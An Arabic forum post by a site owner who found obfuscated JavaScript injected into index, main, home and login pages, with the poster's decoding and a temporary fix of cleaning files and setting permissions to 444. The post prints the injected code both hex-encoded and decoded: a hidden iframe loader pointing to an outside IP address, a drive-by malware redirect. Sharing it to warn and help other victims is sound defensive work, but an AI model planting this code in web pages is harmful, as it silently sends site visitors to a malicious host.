انا لاقيت كل ملفات اللي اسمها index, main, default, home و أحياناً login بجميع الإمتدادات الكود مضاف فيها
كود PHP:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475cfbb5ee60f(v475cfbb5eea25){ return(parseInt(v475cfbb5eea25,16));}function v475cfbb5ef615(v475cfbb5efa11){ function v475cfbb5f0606 () {return 2;} var v475cfbb5efe0d='';for(v475cfbb5f020c=0; v475cfbb5f020c<v475cfbb5efa11.length; v475cfbb5f020c+=v475cfbb5f0606()){ v475cfbb5efe0d+=(String.fromCharCode(v475cfbb5ee60f(v475cfbb5efa11.substr(v475cfbb5f020c, v475cfbb5f0606()))));}return v475cfbb5efe0d;} document.write(v475cfbb5ef615('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D35393964306433207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313332383232292B2730333937365C272077696474683D343731206865696768743D323832207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
و الكود بعد فك تشفيره
كود PHP:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><SCRIPT>windows.status='Done';document.write('<iframe name=559d0d3 src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*132822)+'03976\' width=471 height=282 style='display: none\'></iframe>')</SCRIPT>
الكود يضاف في المسارات التالية فقط
www/index.html
www/folder1/index.html
www/fodler2/index.html
www/.../index.html
و لا يضاف في المجلدات الداخلية مثل
www/folder1/folder_inside_folder1
لا أعتقد أنا المشكلة من الـ Cpanel أو من ثغرة بأي سكريبت
لأني وجدت موقع كله صفحات html بالكامل مصاب و لوحة التحكم له مش CPanel يعني المشكلة مش مشكلة Cpanel
ده حل موقت بس أكيد 100%
- ننظف كل الملفات المصابة يدوي
- علشان نمنع الكود إنه ينضاف تاني نرخص كل ملفات الموقع ترخيص 444 و ده لمنع الكتابة عليها
و لو عاوز تعدل حاجة غير الترخيص مثلاُ لـ 644 و رجعه تاني لـ 444
في بعض السيرفرات الترخيص 444 مش شغال من الـ FTP روح للـ CPanel و غير الترخيص منها
الطريقة اشتغلت معاية تمام
و يارب يبق فيه حل جذري للمشكلة دي